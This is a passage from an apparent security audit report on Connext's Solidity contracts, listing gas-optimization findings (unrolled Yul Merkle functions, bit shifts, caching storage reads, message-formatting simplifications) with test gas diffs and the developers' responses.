mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 10), node) break } switch and(size, shl(11, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 11), node) 79 break } switch and(size, shl(12, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 12), node) break } switch and(size, shl(13, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 13), node) break } switch and(size, shl(14, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 14), node) break } switch and(size, shl(15, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 15), node) break } switch and(size, shl(16, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 16), node) break } switch and(size, shl(17, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, node) 80 node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 17), node) break } switch and(size, shl(18, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, node) node := keccak256(0, 0x40) } 
default { sstore(add(TREE_SLOT, 18), node) break } switch and(size, shl(19, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 19), node) break } switch and(size, shl(20, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 20), node) break } switch and(size, shl(21, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 21), node) break } switch and(size, shl(22, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 22), node) break } 81 switch and(size, shl(23, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 23), node) break } switch and(size, shl(24, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 24), node) break } switch and(size, shl(25, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 25), node) break } switch and(size, shl(26, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 26), node) break } switch and(size, shl(27, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 27), node) break } switch and(size, shl(28, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, node) node := keccak256(0, 0x40) } default { 82 sstore(add(TREE_SLOT, 28), node) break } switch and(size, shl(29, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 29), node) break } switch and(size, shl(30, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 30), node) break } switch and(size, shl(31, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 31), node) break } break } } } Runtime gas saved according to test cases: test_RootManager__propagate_shouldSendToSpoke(bytes32) (gas: -215 (-0.057%)) test_RootManager__propagate_shouldSendToAllSpokes(bytes32) (gas: -3176 (-0.120%)) test_Merkle__insert_shouldUpdateCount() (gas: -1750 (-0.688%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -1630 (-4.194%)) test_messageFlowsWork() (gas: 242592 (7.868%)) <--- due to deployment overhead cost mostly Overall gas change: 235821 (2.808%) Notes: 1. The above sketch does actually return the updated count, unlike the current implementation. 2. SHL(a, b) (where a and b are constants) in the sketch above (and also in the other comments) is a constant expression and the final result should be inlined by the compiler. You can check this fact or inline the final result yourself and save on compile time. We can also mix and match the techniques used here to avoid the big increase in deployment cost. For example, we can decide to not unroll loops. 83 It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. 
Connext: This is great work, but we'll definitely be converting the insert method to use an in-memory reference to the tree, not the tree in storage (for efficiency across multiple insertions, which should be the norm). In order to make this unrolling work, we'd need to switch to just mloading the tree instead in your assembly code. We don't have the internal capability to maintain Yul safely, so adding a large portion to core code paths seems inadvisable Spearbit: Acknowledged. +5.4.16 branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space Severity: Gas Optimization Context: Merkle.sol#L149 Description: We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas. Recommendation: /** * @notice Calculates and returns the merkle root for the given leaf `_item`, * a merkle branch, and the index of `_item` in the tree. * @param _item Merkle leaf * @param _branch Merkle proof * @param _index Index of `_item` in tree * @return _current Calculated merkle root **/ function branchRoot( bytes32 _item, bytes32[TREE_DEPTH] memory _branch, uint256 _index ) internal pure returns (bytes32 _current) { assembly { _current := _item let BRANCH_DATA_OFFSET := _branch let f f := shl(5, and(_index, 1)) mstore(f, _current) mstore(sub(0x20, f), mload(BRANCH_DATA_OFFSET)) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(1, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 1)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(2, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 2)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(3, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 3)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(4, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 4)))) _current := keccak256(0, 0x40) 84 f := shl(5, iszero(and(_index, shl(5, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 5)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(6, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 6)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(7, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 7)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(8, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 8)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(9, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 9)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(10, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 10)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(11, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 11)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(12, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 12)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(13, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 13)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(14, 1)))) mstore(sub(0x20, f), _current) mstore(f, 
mload(add(BRANCH_DATA_OFFSET, shl(5, 14)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(15, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 15)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(16, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 16)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(17, 1)))) 85 mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 17)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(18, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 18)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(19, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 19)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(20, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 20)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(21, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 21)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(22, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 22)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(23, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 23)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(24, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 24)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(25, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 25)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(26, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 26)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(27, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 27)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(28, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 28)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(29, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 29)))) 86 _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(30, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 30)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(31, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 31)))) _current := keccak256(0, 0x40) } } Gas saved according to test cases (runtime gas saving is even more since some deployment gas overhead has been added due to a bigger code size): test_messageFlowsWork() (gas: -12332 (-0.400%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -2118 (-5.450%)) Overall gas change: -14450 (-5.850%) It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. Connext: Solved in PR 2211. Spearbit: Verified. 
+5.4.17 Replace divisions by powers of 2 by right shifts and multiplications by left shifts Severity: Gas Optimization Context: • Merkle.sol#L96 Description: When a variable X is divided (multiplied) by a power of 2 (C = 2 ˆ c) which is a constant value, the division (multiplication) operation can be replaced by a right (left) shift to save gas. Recommendation: Replace X / C by X >> c and X * C by X << c. Here C is a constant which equals to 2 ˆ c. Connext: Solved in PR 2211. Spearbit: Verified. +5.4.18 TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts Severity: Gas Optimization Context: TypedMemView.sol#L306-L307 Description: TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView, instead masking can be used. Also an extra OR is used to calculate the final view. Recommendation: Save gas by changing to: newView := or( and(memView, LOW_27_BYTES_MASK), shl(_27_BYTES_IN_BITS, _newType) ) where LOW_27_BYTES_MASK and _27_BYTES_IN_BITS should be defined as: 87 uint256 private constant _27_BYTES_IN_BITS = 8 * 27; // <--- also used this named constant where ever 216 is used. ,! uint256 private constant LOW_27_BYTES_MASK = (1 << _27_BYTES_IN_BITS) - 1; This would remove 1 OR, 1 SHR and 1 SHL and adds 1 AND. Connext: Solved in PR 2510. Spearbit: Verified. +5.4.19 Make domain immutable in Facets Severity: Gas Optimization Context: LibConnextStorage.sol#L145 Description: Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage. Recommendation: There is a tradeoff between maintaining domain only at AppStorage vs maintaining it in facets. To make domain immutable: • Add domain as an immutable variable to BaseConnextFacet contract. Also add a constructor to initialize domain variable. Currently, these are the facets using s.domain: BridgeFacet.sol, RoutersFacet.sol#L554. Make sure to pass the correct domain value to their constructors. • AssetLogic.sol library also uses s.domain. Pass in the domain as a function argument explicitly from Facets instead of reading it from AppStorage. If applying this recommendation, note that the storage layout will change since now domain doesn't take a storage slot. Connext: After finishing the core work involved in addressing this issue, we discovered that the modifications to the unit tests - which currently rely on a mutable domain value - would require a lot of overhaul in order to use an immutable domain value. The amount of work required here would not fit in the current timeline for launch (short-term). Going to acknowledge this for now. It will be prioritized to be implemented via an upgrade in the future. Spearbit: Acknowledged. +5.4.20 Cache router balance in repayAavePortal() Severity: Gas Optimization Context: PortalFacet.sol#L89-L115 Description: repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ,! ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once. Recommendation: Cache s.routerBalances[msg.sender][local] at the beginning: uint256 routerBalance = s.routerBalances[msg.sender][local]; if (routerBalance < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ... 
+5.4.20 Cache router balance in repayAavePortal()
Severity: Gas Optimization
Context: PortalFacet.sol#L89-L115
Description: repayAavePortal() reads s.routerBalances[msg.sender][local] twice:

if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds();
...
s.routerBalances[msg.sender][local] -= amountDebited;

This can be cached to only read it once.
Recommendation: Cache s.routerBalances[msg.sender][local] at the beginning:

uint256 routerBalance = s.routerBalances[msg.sender][local];
if (routerBalance < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds();
...
s.routerBalances[msg.sender][local] = routerBalance - amountDebited;

Connext: Fixed in PR 2504.
Spearbit: Verified.

+5.4.21 Unrequired if condition
Severity: Gas Optimization
Context: ConnextPriceOracle.sol#L97
Description: The if condition below is not required, as tokenPrice will always be 0 at that point. This is because if the contract finds a direct price for the asset, it returns early; otherwise, if there is no direct price, tokenPrice is set to 0. This means that for the code ahead, tokenPrice will always be 0.

function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) {
    ...
    uint256 tokenPrice = assetPrices[tokenAddress].price;
    if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) {
        return (tokenPrice, uint256(PriceSource.DIRECT));
    } else {
        tokenPrice = 0;
    }
    if (tokenPrice == 0) {
        ...
    }

Recommendation: Remove the unrequired if condition:

- if (tokenPrice == 0) {
    tokenPrice = getPriceFromOracle(tokenAddress);
    source = PriceSource.CHAINLINK;
- }

Connext: getTokenPrice has been rewritten in PR 2232, which takes this issue into consideration.
Spearbit: Verified. Related issue.

+5.4.22 Delete slippage for gas refund
Severity: Gas Optimization
Context: BridgeFacet.sol#L741
Description: Once s.slippage[_transferId] is read, it's never read again. It can be deleted to get a gas refund.
Recommendation: Consider adding this after BridgeFacet.sol#L741:

delete s.slippage[_transferId];

Connext: Fixed in PR 2501.
Spearbit: Verified.

+5.4.23 Emit event at the beginning in _setOwner()
Severity: Gas Optimization
Context: ProposedOwnable.sol#L166
Description: _setOwner() maintains an extra variable oldOwner just to emit an event later:
_params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note, we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified. +5.4.25 Simplify BridgeFacet._sendMessage by defining _token only when needed Severity: Gas Optimization Context: BridgeFacet.sol#L895-L909 Description: In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. But that is not an issue since _token is only used when !_isCanonical. Recommendation: We suggest moving the casting IBridgeToken(_local) inside that if block: 91 // Get the formatted token ID bytes29 _tokenId = BridgeMessage.formatTokenId(_canonical.domain, _canonical.id); // Remove tokens from circulation on this chain if applicable. if (_amount > 0) { if (!_isCanonical) { // If the token originates on a remote chain, burn the representational tokens on this chain. IBridgeToken(_local).burn(address(this), _amount); } // IFF the token IS the canonical token (i.e. originates on this chain), we lock the input tokens in ,! escrow // in this contract, as an equal amount of representational assets will be minted on the destination ,! chain. // NOTE: The tokens should be in the contract already at this point from xcall. 
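        // (18-decimal normalization is only relevant when tokens were actually pulled in, i.e. _amount > 0.)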
    }
Gas saved according to test cases:
    test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%))
    test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%))
    test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%))
    test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%))
    test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%))
    test_Connext__permissionedCallsWork() (gas: -39 (-0.003%))
    test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%))
    test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%))
    test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%))
    test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%))
    test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%))
    test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%))
    test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%))
    test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%))
    test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%))
    test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%))
    test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%))
    Overall gas change: -6054 (-0.308%)
Note: we need to make sure that in future updates the value of _params.normalizedIn is 0 for any invocation of _xcall.
Connext: Solved in PR 2511.
Spearbit: Verified.
+5.4.25 Simplify BridgeFacet._sendMessage by defining _token only when needed
Severity: Gas Optimization
Context: BridgeFacet.sol#L895-L909
Description: In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. But that is not an issue, since _token is only used when !_isCanonical.
Recommendation: We suggest moving the cast IBridgeToken(_local) inside that if block:
    // Get the formatted token ID
    bytes29 _tokenId = BridgeMessage.formatTokenId(_canonical.domain, _canonical.id);
    // Remove tokens from circulation on this chain if applicable.
    if (_amount > 0) {
        if (!_isCanonical) {
            // If the token originates on a remote chain, burn the representational tokens on this chain.
            IBridgeToken(_local).burn(address(this), _amount);
        }
        // IFF the token IS the canonical token (i.e. originates on this chain), we lock the input tokens in escrow
        // in this contract, as an equal amount of representational assets will be minted on the destination chain.
        // NOTE: The tokens should be in the contract already at this point from xcall.
    }
As a bonus, we also save some gas according to test cases:
    test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -11 (-0.000%))
    test_Connext__bridgeFastAdoptedShouldWork() (gas: -11 (-0.000%))
    test_Connext__unpermissionedCallsWork() (gas: -11 (-0.001%))
    test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -11 (-0.001%))
    test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -11 (-0.001%))
    test_Connext__permissionedCallsWork() (gas: -11 (-0.001%))
    test_BridgeFacet__xcallIntoLocal_works() (gas: -11 (-0.001%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -11 (-0.001%))
    test_Connext__bridgeFastLocalShouldWork() (gas: -11 (-0.001%))
    test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -11 (-0.001%))
    test_BridgeFacet__xcall_worksWithoutValue() (gas: -11 (-0.001%))
    test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -11 (-0.001%))
    test_Connext__bridgeSlowLocalShouldWork() (gas: -11 (-0.001%))
    test_Connext__zeroValueTransferShouldWork() (gas: -11 (-0.001%))
    test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -600 (-0.002%))
    test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -11 (-0.004%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -11 (-0.004%))
    test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -9 (-0.004%))
    test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -11 (-0.004%))
    test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -11 (-0.007%))
    Overall gas change: -807 (-0.037%)
Connext: Solved in PR 2508.
Spearbit: Verified.
+5.4.26 Using the BridgeMessage library in BridgeFacet._sendMessage can be avoided to save gas
Severity: Gas Optimization
Context: BridgeFacet.sol#L898-L918
Description: The usage of the BridgeMessage library to calculate _tokenId, _action, and finally the formatted message involves lots of unnecessary memory writes and redundant checks, and overall complicates understanding the flow of the codebase. With the current implementation, the BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch ends up being:
    abi.encodePacked(
        _canonical.domain,
        _canonical.id,
        BridgeMessage.Types.Transfer,
        _amount,
        _transferId
    );
Also, it is redundant that BridgeMessage.Types.Transfer is passed to dispatch: it does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption, both in the origin and destination domains.
Recommendation: Remove the BridgeMessage.format... lines from _sendMessage and supply the final message to dispatch:
    function _sendMessage(
        bytes32 _transferId,
        uint32 _destination,
        bytes32 _connextion,
        TokenId memory _canonical,
        address _local,
        uint256 _amount,
        bool _isCanonical
    ) private returns (bytes32) {
        IBridgeToken _token = IBridgeToken(_local);
        // Remove tokens from circulation on this chain if applicable.
        if (_amount > 0) {
            if (!_isCanonical) {
                // If the token originates on a remote chain, burn the representational tokens on this chain.
                _token.burn(address(this), _amount);
            }
            // IFF the token IS the canonical token (i.e. originates on this chain), we lock the input tokens in escrow
            // in this contract, as an equal amount of representational assets will be minted on the destination chain.
            // NOTE: The tokens should be in the contract already at this point from xcall.
        }
        bytes memory _messageBody = abi.encodePacked(
            _canonical.domain,
            _canonical.id,
            BridgeMessage.Types.Transfer,
            _amount,
            _transferId
        );
        // Send message to destination chain bridge router.
        bytes32 _messageHash = IOutbox(s.xAppConnectionManager.home()).dispatch(
            _destination,
            _connextion,
            _messageBody
        );
        // return message hash
        return _messageHash;
    }
And as we can see by the gas diff in test cases, we will save a lot of gas:
    test_BridgeFacet__execute_worksWithAdopted() (gas: 21 (0.002%))
    test_BridgeFacet__execute_worksWithNegativeSlippage() (gas: 21 (0.002%))
    test_BridgeFacet__execute_worksWithPositiveSlippage() (gas: 21 (0.002%))
    test_BridgeFacet__execute_respectsSlippageOverrides() (gas: 21 (0.002%))
    test_BridgeFacet__execute_receiveLocalWorks() (gas: 21 (0.002%))
    test_BridgeFacet__execute_calldataFailsLoudlyOnFast() (gas: 7 (0.002%))
    test_BridgeFacet__execute_handleAlreadyReconciled() (gas: -6 (-0.002%))
    test_BridgeFacet__execute_calldataFailureHandledOnSlow() (gas: -6 (-0.002%))
    test_BridgeFacet__execute_failIfNoRoutersAndNotReconciled() (gas: -2 (-0.003%))
    test_BridgeFacet__execute_failsIfRouterNotApprovedForPortal() (gas: 7 (0.003%))
    test_BridgeFacet__execute_failsIfNoLiquidityAndAaveNotEnabled() (gas: 7 (0.004%))
    test_BridgeFacet__execute_failIfSignatureInvalid() (gas: 7 (0.005%))
    test_BridgeFacet__execute_failIfSequencerSignatureAndSequencerAddressMismatch() (gas: 7 (0.005%))
    test_BridgeFacet__execute_failIfSequencerSignatureInvalid() (gas: 7 (0.005%))
    test_BridgeFacet__execute_worksOnCanonical() (gas: 21 (0.005%))
    test_BridgeFacet__execute_failIfAlreadyExecuted() (gas: 7 (0.005%))
    test_BridgeFacet__execute_worksWithAave() (gas: 21 (0.005%))
    test_BridgeFacet__execute_successfulCalldata() (gas: 21 (0.006%))
    test_BridgeFacet__execute_worksWithDelegateAsSender() (gas: 21 (0.006%))
    test_BridgeFacet__execute_worksWithLocalAsAdopted() (gas: 21 (0.006%))
    test_BridgeFacet__execute_worksWithUnapprovedIfNoWhitelist() (gas: 21 (0.007%))
    test_BridgeFacet__execute_noCalldataWorks() (gas: 21 (0.007%))
    test_BridgeFacet__execute_worksWithEmptyCanonicalIfZeroValue() (gas: 21 (0.007%))
    test_BridgeFacet__execute_failIfRouterHasInsufficientFunds() (gas: 16 (0.007%))
    test_BridgeFacet__execute_failIfRouterNotApproved() (gas: 7 (0.007%))
    test_BridgeFacet__execute_failIfSequencerNotApproved() (gas: 7 (0.008%))
    test_BridgeFacet__execute_worksWith0Value() (gas: 21 (0.008%))
    test_BridgeFacet__execute_failIfPaused() (gas: 7 (0.009%))
    test_BridgeFacet__execute_failIfSenderNotApproved() (gas: 7 (0.009%))
    test_BridgeFacet__execute_failIfAnyRouterHasInsufficientFunds() (gas: 43 (0.010%))
    test_BridgeFacet__execute_failIfAnySignatureInvalid() (gas: 34 (0.014%))
    test_BridgeFacet__execute_failIfSequencerSignatureAndRoutersMismatch() (gas: 34 (0.017%))
    test_BridgeFacet__execute_failIfPathLengthGreaterThanMaxRouters() (gas: 52 (0.022%))
    test_BridgeFacet__execute_multipath() (gas: 129 (0.023%))
    test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -5039 (-0.104%))
    test_Connext__bridgeFastAdoptedShouldWork() (gas: -5038 (-0.106%))
    test_Connext__unpermissionedCallsWork() (gas: -5038 (-0.373%))
    test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -5038 (-0.431%))
    test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -5038 (-0.431%))
    test_Connext__permissionedCallsWork() (gas: -5038 (-0.434%))
    test_BridgeFacet__xcallIntoLocal_works() (gas: -5038 (-0.438%))
    test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -5038 (-0.439%))
